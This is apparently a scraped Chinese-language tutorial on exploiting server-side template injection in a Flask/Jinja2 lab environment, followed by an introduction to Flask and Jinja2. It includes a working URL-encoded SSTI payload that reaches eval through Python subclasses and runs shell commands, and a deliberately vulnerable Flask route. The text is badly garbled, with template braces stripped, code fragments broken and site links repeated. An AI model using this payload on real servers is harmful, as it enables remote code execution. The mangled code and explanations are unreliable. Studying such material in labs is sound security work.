Flask（Jinja2）服務端模板注入漏洞

1.漏洞編號：

2.影響版本：

3.漏洞產生原因：

先進入容器看一下web服務的**

啟動環境:docker-compose up -d

vulnip:192.168.1.182

環境啟動後，訪問`http://your-ip:8080`即可看到flask預設首頁。

完全可控，那麼就可以直接寫入

jinja2

的模板語言。

`http://your-ip/?name=}`，得到

54289

，說明ssti

漏洞存在。

關注flask的版本

在url後面增加

會觸發乙個

xss漏洞。

直接從globals中尋找eval

獲取eval函式並執行任意

python

**的poc

：

.__class__ %}
}

訪問`http://your-ip:8000/?name=%7b%25%20for%20c%20in%20%5b%5d.__class__.__base__.__subclasses__()%20%25%7d%0a%7b%25%20if%20c.__name__%20%3d%3d%20%27catch_warnings%27%20%25%7d%0a%20%20%7b%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7d%0a%20%20%7b%25%20if%20b.__class__%20%3d%3d%20%7b%7d.__class__%20%25%7d%0a%20%20%20%20%7b%25%20if%20%27eval%27%20in%20b.keys()%20%25%7d%0a%20%20%20%20%20%20%7b%7b%20b%5b%27eval%27%5d(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7d%7d%0a%20%20%20%20%7b%25%20endif%20%25%7d%0a%20%20%7b%25%20endif%20%25%7d%0a%20%20%7b%25%20endfor%20%25%7d%0a%7b%25%20endif%20%25%7d%0a%7b%25%20endfor%20%25%7d`，得到執行結果：

尋找__builtins__得到eval

用jinja的語法即為（執行命令使用

os.popen('whoami').read()

才有執行結果的回顯）

from
flask import flask, request
from
jinja2 import template  
"/safe")
def safe():
name = request.args.get('
name
', '
guest')
t = template("
hello }")
return t.render(n=name)
if __name__ == "
__main__
":

flaskflask 是乙個 web 框架。也就是說 flask 為你提供工具，庫和技術來允許你構建乙個 web 應用程式。這個 wdb 應用程式可以使一些 web 頁面、部落格、wiki、基於 web 的日曆應用或商業**。

flask 屬於微框架（micro-framework）這一類別，微架構通常是很小的不依賴於外部庫的框架。這既有優點也有缺點，優點是框架很輕量，更新時依賴少，並且專注安全方面的 bug，缺點是，你不得不自己做更多的工作，或通過新增外掛程式增加自己的依賴列表。flask 的依賴如下：

flask簡單易學，下面是flask版的hello world(hello.py):

from
flask import flask"/
")def hello():    
return
"hello world!
"if __name__ == "
__main__
":

jinja 2

# 取值
}#}```
demo
```from
jinja2 import template
t=template('}'
)print t.render()

2021-02-19 22:10:04

Flask（Jinja2）服務端模板注入漏洞

Flask jinja2模板for迴圈

HTTP服務端JSON服務端

HTTP 2服務端推送

Flask（Jinja2） 服務端模板注入漏洞

Flask jinja2模板for迴圈

HTTP服務端JSON服務端

HTTP 2服務端推送

相關推薦

Flask（Jinja2）服務端模板注入漏洞